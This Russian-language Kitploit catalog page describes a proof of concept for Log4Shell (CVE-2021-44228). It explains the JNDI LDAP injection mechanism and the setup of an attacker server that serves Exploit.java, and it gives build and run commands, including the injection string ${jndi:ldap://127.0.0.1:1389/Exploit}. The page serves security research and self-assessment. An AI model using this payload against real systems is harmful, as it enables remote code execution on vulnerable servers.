Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2021-44228-rce-poc — PoC удаленного выполнения кода для Log4Shell (CVE-2021-44228) | Kitploit
Инструменты/GitHubGitHub/ubitech/cve-2021-44228-rce-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHububitech/cve-2021-44228-rce-poc

cve-2021-44228-rce-poc

PoC удаленного выполнения кода для Log4Shell (CVE-2021-44228)

Репозиторий
3224 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-44228 Эксплуатация удаленного выполнения команд (PoC)

Этот репозиторий позволяет исследователям безопасности экспериментировать с удаленным выполнением кода, предоставляя реализацию сервера атаки, который загружает пользовательский эксплойт на уязвимое приложение, содержащее log4j.

⚠️ Инструмент предназначен для самооценки и должен использоваться только уполномоченными лицами или исследователями. Вы должны тестировать только те системы, на которые имеете явное разрешение или полномочия. Если вы обнаружите уязвимые приложения или библиотеки, следует соблюдать ответственное раскрытие.

Шаги RCE

CVE-2021-44228 работает путем внедрения строки JNDI LDAP в журналы, что заставляет Log4j обратиться к указанному LDAP серверу для поиска дополнительной информации. В вредоносном сценарии LDAP сервер может затем передать код обратно на машину жертвы, который будет автоматически выполнен в памяти.

Репозиторий содержит два подпроекта. Проект attacker-server содержит исходный код двух многопоточных серверов. Первый — это LDAP прокси, который принимает начальный запрос на LDAP объект. Второй сервер — это сервер нагрузки, который передает эксплойт (находящийся в Exploit.java) обратно уязвимому приложению.

Сборка

В корне проекта:

root@kitploit:~
mvn clean install

Сервер и уязвимое приложение должны быть готовы.

Запуск PoC

Для запуска сервера выполните:

root@kitploit:~
java -jar attacker-server/target/attacker-server-0.0.1-SNAPSHOT-jar-with-dependencies.jar

Для запуска RCE выполните:

root@kitploit:~
java -jar vulnapp/target/vulnapp-0.0.1-SNAPSHOT-jar-with-dependencies.jar \${jndi:ldap://127.0.0.1:1389/Exploit}

Вы можете изменить вредоносную нагрузку по необходимости, расширив Exploit.java.

Скачать инструмент